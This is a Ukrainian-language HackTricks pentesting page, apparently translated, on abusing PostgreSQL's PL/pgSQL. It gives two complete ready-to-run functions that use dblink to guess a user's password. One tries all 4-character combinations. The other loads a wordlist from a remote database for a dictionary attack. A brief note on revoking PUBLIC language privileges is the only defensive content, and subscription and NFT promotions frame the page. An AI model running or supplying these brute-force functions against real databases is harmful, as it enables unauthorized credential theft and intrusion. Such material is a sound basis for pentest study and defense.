Ви працюєте в кібербезпеці компанії? Хочете побачити, як ваша компанія рекламується на HackTricks? або ви хочете мати доступ до останньої версії PEASS або завантажити HackTricks у PDF? Перевірте ПЛАНИ ПІДПИСКИ!
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
PL/pgSQL - це повнофункціональна мова програмування, яка виходить за межі можливостей SQL, пропонуючи покращене процедурне управління. Це включає використання циклів та різних структур управління. Функції, створені мовою PL/pgSQL, можуть бути викликані SQL-операціями та тригерами, розширюючи обсяг операцій у середовищі бази даних.
Ви можете зловживати цією мовою, щоб запросити PostgreSQL перебрати облікові дані користувачів, але вони повинні існувати в базі даних. Ви можете перевірити їх наявність за допомогою:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+---------plpgsql |
За замовчуванням створення функцій є привілеєм, наданим PUBLIC, де PUBLIC вказує на кожного користувача в цій базі даних. Щоб цього уникнути, адміністратор міг би відкликати привілеї USAGE від домену PUBLIC:
REVOKE ALL PRIVILEGES ONLANGUAGE plpgsql FROM PUBLIC;
У цьому випадку наш попередній запит виведе різні результати:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+-----------------plpgsql | {admin=U/admin}
Зверніть увагу, що для роботи наступного скрипту потрібно наявність функції dblink. Якщо її немає, ви можете спробувати створити її за допомогою
CREATE EXTENSION dblink;
Перебір паролів
Ось як ви можете виконати перебір паролів з 4 символів:
//Create the brute-forcefunctionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$DECLAREword TEXT;BEGINFOR a IN65..122LOOPFOR b IN65..122LOOPFOR c IN65..122LOOPFOR d IN65..122LOOPBEGINword := chr(a) || chr(b) || chr(c) || chr(d);PERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnectionTHEN-- do nothingEND;ENDLOOP;ENDLOOP;ENDLOOP;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql';//Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Зверніть увагу, що навіть перебір 4 символів може зайняти кілька хвилин.
Ви також можете завантажити словник та спробувати лише ці паролі (атака словником):
//Create the functionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$BEGINFOR word IN (SELECT word FROM dblink('host=1.2.3.4user=namepassword=qwertydbname=wordlists','SELECT word FROM wordlist')RETURNS (word TEXT)) LOOPBEGINPERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnection THEN-- do nothingEND;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql'-- Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Чи працюєте ви в кібербезпеці компанії? Хочете побачити вашу компанію рекламовану на HackTricks? або хочете мати доступ до останньої версії PEASS або завантажити HackTricks у форматі PDF? Перевірте ПЛАНИ ПІДПИСКИ!
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
